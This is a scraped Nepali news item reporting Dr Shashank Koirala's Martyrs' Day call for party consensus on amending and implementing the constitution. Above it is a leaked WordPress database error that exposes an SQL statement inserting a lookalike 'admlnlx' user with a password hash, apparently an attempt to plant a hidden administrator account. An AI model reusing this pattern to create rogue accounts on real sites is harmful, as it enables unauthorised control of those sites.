WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bv2J2V3tY8R.gE/gNxPwgHdzmccsx1.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 09:49:36', '', 'admlnlx', 'admlnlx')
नवलपरासी, माघ १७ –
नेपाली कांग्रेसका महामन्त्री डा शशाङ्क कोइरालाले संविधान कार्यान्वयनका लागि दलहरुबीच सहमतिको विकल्प नभएको बताउनुभएको छ ।सहिद दिवसका अवसरमा आइतबार नवलपरासीमा नेपाली कांग्रेस गैँडाकोट नगर समितिद्वारा आयोजित कार्यक्रममा महामन्त्री डा कोइरालाले यस्तो विचार व्यक्त गर्नुभएको हो ।
उहाँले मुलुक अझै पनि संविधान कार्यान्वयनको दिशामा अघि बढ्न नसकेकोप्रति चिन्ता व्यक्त गर्दै वर्तमान सङ्कटको निकास खोज्न सबै दलबीच सहमति हुनुपर्ने विचार राख्नुभयो ।
उहाँले संविधान जारी गर्दा एक ठाउँमा उभिएका तीन शीर्ष दल संविधान संशोधनमा पनि एकै ठाउँमा उभिनु आजको आवश्यकता भएकाले एमालेलाई साथमा लिएर संविधान संशोधन गर्नुपर्छ भन्नुभयो ।नवलपरासी निर्वाचन क्षेत्र नं १ का सांसद समेत रहनुभएका डा कोइरालाले सहिदले देखाएको बाटोमा अघि बढ्न सके मात्रै मुलुकले सही निकास पाउने बताउनुभयो । रासस